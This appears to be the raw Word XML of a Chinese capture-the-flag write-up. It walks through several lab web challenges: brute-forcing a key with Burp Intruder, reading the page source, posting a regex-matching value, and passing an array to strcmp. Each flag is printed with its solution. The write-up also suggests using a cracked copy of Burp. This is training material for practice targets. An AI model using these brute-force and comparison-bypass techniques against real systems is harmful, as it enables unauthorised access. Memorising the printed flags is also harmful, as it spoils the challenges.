            <wp:docPr id="68" name="图片 68" descr="http://192.168.109.235/storage/images/86375ac588231607b3bb58e95719c19b/2018-12-10-14-39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://192.168.109.235/storage/images/86375ac588231607b3bb58e95719c19b/2018-12-10-14-39-37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A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆破小组准备，Ｄｕａｎｇ！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00756DF1" w:rsidRPr="009D5D31" w:rsidRDefault="00A612D3" w:rsidP="00756DF1">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F64893">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00756DF1" w:rsidRPr="00F64893">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>e4a4aec4c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>54123e7ac2a6eeb9068aaf1bbef27e8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00756DF1" w:rsidRPr="00756DF1" w:rsidRDefault="00756DF1" w:rsidP="00756DF1"/>
    <w:p w:rsidR="00C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6C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C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6C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C11E6C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C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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11E6C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C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6C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C11E6C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11E6C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>burp</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11E6C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11E6C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11E6C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进行爆破</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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11E6C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C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6C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C11E6C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>密码破解</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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11E6C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C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6C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/38,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通过使用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burp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对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进行爆破，找到其中的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C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6C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C11E6C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C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6C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打开火狐浏览器，输入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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C11E6C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&lt;http://10.10.23.105/38/&gt;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C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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718714" cy="1911439"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="82" name="图片 82" descr="http://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-14-43-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://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-14-43-41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016" cy="1920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E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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查看源码，发现提示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1-255</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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644774" cy="1926544"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="81" name="图片 81" descr="http://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-14-44-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://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-14-44-36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104" cy="1943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E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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打开</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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，如果没有可以到官网下载</w:t>
      </w:r>
      <w:r w:rsidR="00666AB2" w:rsidRPr="00666AB2">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="000359F6">
        <w:instrText xml:space="preserve"> HYPERLINK "https://portswigger.net/burp/download.html" </w:instrText>
      </w:r>
      <w:r w:rsidR="00666AB2" w:rsidRPr="00666AB2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00C11E6C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4183C4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://portswigger.net/burp/download.html</w:t>
      </w:r>
      <w:r w:rsidR="00666AB2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4183C4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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，也可以找破解版。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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4530173" cy="3361841"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="80" name="图片 80" descr="http://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-24-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://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-24-09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002" cy="3381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E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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设置好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burp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的监听地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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18886" cy="2222554"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6350"/>
            <wp:docPr id="79" name="图片 79" descr="http://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-24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://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-24-13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378" cy="2234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E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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设置浏览器的监听地址，点击选项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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891628" cy="3659214"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="78" name="图片 78" descr="http://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-24-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://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-24-19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908429" cy="36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E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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6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如图设置浏览器的代理地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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104635" cy="3991825"/>
            <wp:effectExtent l="0" t="0" r="1270" b="8890"/>
            <wp:docPr id="77" name="图片 77" descr="http://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-24-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://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-24-27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004" cy="4014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E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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lastRenderedPageBreak/>
        <w:t>步骤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7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随便提交一个查询，用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burp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抓取数据包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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391150" cy="1028700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="76" name="图片 76" descr="http://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-15-23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://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-15-23-29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E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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8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看到提交的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值，右键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action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将数据包发送到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intruder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进行爆破</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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8258175" cy="4105275"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="75" name="图片 75" descr="http://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-24-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://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-24-36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E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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9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进入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intruder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，选择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payloads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，将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payload type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设置成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numbers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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9344025" cy="6934200"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="74" name="图片 74" descr="http://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-24-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://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-24-42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4025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E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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10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设置从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1-255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，步长为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</w:p>
    <w:p w:rsidR="00C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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534025" cy="4143375"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="73" name="图片 73" descr="http://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-24-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://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-24-46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E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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11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找到菜单栏的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intruder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，选择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start attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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3943350" cy="2943225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="72" name="图片 72" descr="http://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-24-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://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-24-50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E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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12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找到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length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不一样的值</w:t>
      </w:r>
      <w:r w:rsidR="00B8023C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B8023C" w:rsidRPr="00B8023C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>230</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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394645" cy="3409466"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="71" name="图片 71" descr="http://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-24-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://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-24-56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160" cy="3419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E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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13</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11E6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找到这个界面，查看页面信息，得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11E6C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C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6C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185475" cy="3277269"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="70" name="图片 70" descr="http://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-25-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://192.168.109.235/storage/images/009fbb1a35b0fd2941c765386a9f4cd6/2018-12-10-11-25-00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406" cy="329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A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ｆｌａｇ在哪里</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005656CB" w:rsidRPr="005656CB" w:rsidRDefault="009939AC" w:rsidP="00176643">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009939AC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1we4rfvgy7mnbvc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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5656CB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5656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656C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5656CB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5656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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5656CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>基础源码查看</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656C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5656CB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5656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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5656CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>信息隐藏</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656C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5656CB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5656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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/39,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通过浏览器功能查看源码可见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5656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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5656CB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5656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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656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5656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5656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打开火狐浏览器，输入网址</w:t>
      </w:r>
      <w:r w:rsidRPr="005656CB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&lt;http://192.168.15.28/39/&gt;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5656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5656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地址以真实获取到的为准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）访问</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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581525" cy="1266825"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="84" name="图片 84" descr="http://192.168.109.235/storage/images/c9686f2519cb21c96e9b2a043d96751f/2018-12-10-15-26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://192.168.109.235/storage/images/c9686f2519cb21c96e9b2a043d96751f/2018-12-10-15-26-12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6CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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656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5656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5656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右键查看源码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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4817911" cy="2581275"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="83" name="图片 83" descr="http://192.168.109.235/storage/images/c9686f2519cb21c96e9b2a043d96751f/2018-12-10-15-27-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://192.168.109.235/storage/images/c9686f2519cb21c96e9b2a043d96751f/2018-12-10-15-27-00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594" cy="259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A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如法炮制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00756DF1" w:rsidRPr="00756DF1" w:rsidRDefault="00756DF1" w:rsidP="00756DF1">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF1AAC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>SDPC_IS_G00D</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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5656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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5656CB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5656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656C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5656CB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5656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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5656CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Post</w:t>
      </w:r>
      <w:r w:rsidRPr="005656CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提交，正则表达式匹配</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656C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5656CB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5656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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5656CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正则表达式匹配</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656C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5656CB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5656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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/40,Post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提交，正则表达式匹配，找到其中的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5656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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5656CB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5656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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656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5656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5656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打开火狐浏览器，输入网址</w:t>
      </w:r>
      <w:r w:rsidRPr="005656CB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&lt;http://192.168.15.28/40/&gt;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5656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5656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地址以真实获取的为准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5656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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262216" cy="2347670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="89" name="图片 89" descr="http://192.168.109.235/storage/images/c1f1c5717f1f81f88038a2de7b9d4dd1/2018-12-10-15-29-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://192.168.109.235/storage/images/c1f1c5717f1f81f88038a2de7b9d4dd1/2018-12-10-15-29-38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50" cy="23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6CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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656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5656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5656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分析代码是正则匹配，打开火狐的附件管理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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2905125" cy="5619750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="88" name="图片 88" descr="http://192.168.109.235/storage/images/c1f1c5717f1f81f88038a2de7b9d4dd1/2018-12-10-11-27-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http://192.168.109.235/storage/images/c1f1c5717f1f81f88038a2de7b9d4dd1/2018-12-10-11-27-45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6CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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656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lastRenderedPageBreak/>
        <w:t>步骤</w:t>
      </w:r>
      <w:r w:rsidRPr="005656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5656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下载</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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HackBar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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，并启用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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362575" cy="781050"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="87" name="图片 87" descr="http://192.168.109.235/storage/images/c1f1c5717f1f81f88038a2de7b9d4dd1/2018-12-10-11-27-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://192.168.109.235/storage/images/c1f1c5717f1f81f88038a2de7b9d4dd1/2018-12-10-11-27-51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6CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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656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5656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5656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按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F9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调用，点击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Enable Post data,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输入如图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B71DC" w:rsidRPr="006B71DC" w:rsidRDefault="006B71DC" w:rsidP="005656CB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b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B71DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id=sdpc1sdpc1111sdpc:/1/1sdpc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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286500" cy="2724150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="86" name="图片 86" descr="http://192.168.109.235/storage/images/c1f1c5717f1f81f88038a2de7b9d4dd1/2018-12-10-15-31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://192.168.109.235/storage/images/c1f1c5717f1f81f88038a2de7b9d4dd1/2018-12-10-15-31-01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6CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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656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5656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5656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成功弹出</w:t>
      </w:r>
      <w:r w:rsidRPr="005656CB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5656CB" w:rsidRPr="005656CB" w:rsidRDefault="005656CB" w:rsidP="005656CB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133975" cy="3057525"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="85" name="图片 85" descr="http://192.168.109.235/storage/images/c1f1c5717f1f81f88038a2de7b9d4dd1/2018-12-10-15-31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://192.168.109.235/storage/images/c1f1c5717f1f81f88038a2de7b9d4dd1/2018-12-10-15-31-20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A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>这是一道简单的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F165F2" w:rsidRPr="00F165F2" w:rsidRDefault="00F165F2" w:rsidP="00F165F2">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386719">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>you_are_a_good_boy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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C941F4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C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F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941F4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C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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C941F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C941F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>strcmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C941F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数传入数组报错</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F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941F4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C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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C941F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00C941F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F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941F4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C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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/41,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C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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C941F4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C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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利用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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strcmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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函数传入数组报错</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C941F4" w:rsidRPr="00C941F4" w:rsidRDefault="00C941F4" w:rsidP="00C941F4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C941F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941F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C941F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打开火狐浏览器，输入</w:t>
      </w:r>
